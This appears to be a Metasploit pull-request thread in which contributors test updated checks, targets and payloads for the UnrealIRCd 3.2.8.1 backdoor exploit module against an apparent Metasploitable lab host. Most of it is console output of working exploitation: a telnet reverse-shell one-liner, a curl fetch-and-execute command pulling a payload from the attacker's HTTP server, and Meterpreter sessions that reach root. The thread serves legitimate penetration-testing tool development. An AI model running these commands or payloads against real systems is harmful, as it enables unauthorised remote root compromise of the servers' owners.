Unreal_ircd_3281_backdoor: Add checks & targets

[g0tmi1k]

After

Setup:

$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; options; show targets'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/unix/reverse

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command (Generic)



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix Command (Generic)
    1   Unix Command


msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

Check:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > check
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: swqkly
    :irc.Metasploitable.LAN 001 swqkly :Welcome to the TestIRC IRC Network swqkly!swqkly@10.0.0.1
    :irc.Metasploitable.LAN 002 swqkly :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
    :irc.Metasploitable.LAN 003 swqkly :This server was created Sun May 20 2012 at 14:04:37 EDT
    :irc.Metasploitable.LAN 004 swqkly irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.Metasploitable.LAN 005 swqkly UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.Metasploitable.LAN 005 swqkly WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.Metasploitable.LAN 005 swqkly EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[+] 10.0.0.10:6667 - The target is vulnerable.
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

Target 0:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[+] sh -c '(sleep 3819|telnet 10.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 10.0.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] 10.0.0.10:6667 - Waiting for trigger
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iXVXTfgtLX5424Iq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iXVXTfgtLX5424Iq\r\n"
[*] Matching...
[*] A is input...
[*] 10.0.0.10:6667 - Done!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60363) at 2026-02-10 20:33:24 +0000

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.10 - Command shell session 1 closed.  Reason: User exit
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

Target 1:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET 1
TARGET => 1
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    6667             yes       The target port (TCP)


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] 10.0.0.10:6667 - Waiting for trigger
[*] Sending stage (23408 bytes) to 10.0.0.10
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.10:60365) at 2026-02-10 20:33:55 +0000
[*] 10.0.0.10:6667 - Done!

meterpreter >
meterpreter > shell
Process 5385 created.
Channel 1 created.
id
uid=0(root) gid=0(root)

[bwatters-r7]

Note to self- check if payload selection works on this module

[g0tmi1k]

Thanks for your time @dwelch-r7 & @bwatters-r7 !
Based on your input, I've done 4c5142e & 38e9595

[g0tmi1k]

Just done a force push.

Result

$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; check; run'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/linux/http/x86/meterpreter/reverse_tcp
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: romona
[*] 10.0.0.10:6667 - NICK romona
[*] 10.0.0.10:6667 - USER romona 0 * romona
    :irc.Metasploitable.LAN 001 romona :Welcome to the TestIRC IRC Network romona!romona@10.0.0.1
    :irc.Metasploitable.LAN 002 romona :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
    :irc.Metasploitable.LAN 003 romona :This server was created Sun May 20 2012 at 14:04:37 EDT
    :irc.Metasploitable.LAN 004 romona irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.Metasploitable.LAN 005 romona UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.Metasploitable.LAN 005 romona WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.Metasploitable.LAN 005 romona EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[*] 10.0.0.10:6667 - The target appears to be vulnerable.
[*] Command to run on remote host: curl -so ./wCTrvPzx http://10.0.0.1:8080/w4fGVgXiKHSuZJ1djTweGw;chmod +x ./wCTrvPzx;./wCTrvPzx&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w4fGVgXiKHSuZJ1djTweGw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] Client 10.0.0.10 requested /w4fGVgXiKHSuZJ1djTweGw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60114) at 2026-02-20 09:01:51 +0000

meterpreter >

[bwatters-r7]

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
                                      loit.html
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Lin
                                              ux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Acce
                                              pted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST                            yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      ITcxgSnPy        no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.5.132.178
rhost => 10.5.132.178
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.132.178:6667 - Connected to 10.5.132.178:6667
[*] 10.5.132.178:6667 - Sending IRC backdoor command
[*] Sending stage (1062760 bytes) to 10.5.132.178
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.178:40516) at 2026-02-24 09:11:52 -0600

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: root
meterpreter > 

[bwatters-r7]

Release Notes

Enhances the unix/irc/unreal_ircd_3281_backdoor module to increase payload options, including adding a native Meterpreter session, adds debugging logic inside the module, and more verbose output.

[g0tmi1k]

Thanks @bwatters-r7 :D